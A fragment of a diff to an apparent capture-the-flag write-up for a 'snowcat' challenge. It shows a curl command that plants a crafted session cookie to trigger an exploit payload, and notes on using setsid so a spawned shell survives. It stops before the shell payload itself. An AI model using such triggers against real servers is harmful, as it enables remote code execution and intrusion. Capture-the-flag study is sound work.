MitchDarrow/HHC_2025/snowcat.md

 <!-- Trigger payload -->
 curl -s -H "Cookie: JSESSIONID=.${SESSION_ID}" "http://localhost/" > /dev/null
 ```
 Initial payloads failed, due to the payload script completing before the shell was established, killing the shell.
-Use setsid to detach the shell process from the script, allowing it to establish the connection.
+Using setsid to detach the shell process from the script, allowed it to establish the connection.

 The payload used setid and ran the shell was:
 ```sh